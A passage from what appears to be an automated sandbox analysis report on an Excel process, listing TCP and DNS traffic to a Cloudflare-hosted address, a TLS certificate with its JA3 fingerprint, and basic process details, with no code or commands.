Nov 19, 2020 08:40:56.003268957 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:56.005387068 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:56.005543947 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:56.008194923 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:56.028491974 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:56.038949966 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:56.058346033 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.747128010 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.747159004 CET | 443 | 49166 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.747410059 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.748452902 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.748538017 CET | 49166 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.763767958 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.792777061 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.792877913 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.793663025 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.822859049 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.826030970 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.826165915 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.827143908 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.837183952 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:58.855901957 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:58.866272926 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762340069 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762376070 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762401104 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762412071 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762428045 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762439013 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762459040 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762474060 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762511015 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.762543917 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.762712955 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762733936 CET | 443 | 49167 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:41:01.762764931 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.762778044 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.765209913 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:41:01.765243053 CET | 49167 | 443 | 192.168.2.22 | 104.27.173.15 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 19, 2020 08:40:53.727904081 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Nov 19, 2020 08:40:53.741152048 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Nov 19, 2020 08:40:53.727904081 CET | 192.168.2.22 | 8.8.8.8 | 0xfbeb | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Nov 19, 2020 08:40:53.741152048 CET | 8.8.8.8 | 192.168.2.22 | 0xfbeb | No error (0) | 104.27.173.15 | A (IP address) | IN (0x0001) | ||
Nov 19, 2020 08:40:53.741152048 CET | 8.8.8.8 | 192.168.2.22 | 0xfbeb | No error (0) | 104.27.172.15 | A (IP address) | IN (0x0001) | ||
Nov 19, 2020 08:40:53.741152048 CET | 8.8.8.8 | 192.168.2.22 | 0xfbeb | No error (0) | 172.67.221.76 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Nov 19, 2020 08:40:53.839088917 CET | 104.27.173.15 | 443 | 192.168.2.22 | 49165 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Sun Nov 01 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020 | Mon Nov 01 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |
Code Manipulations |
---|
Statistics |
---|
System Behavior |
---|
General |
---|
Start time: | 08:40:44 |
Start date: | 19/11/2020 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f560000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|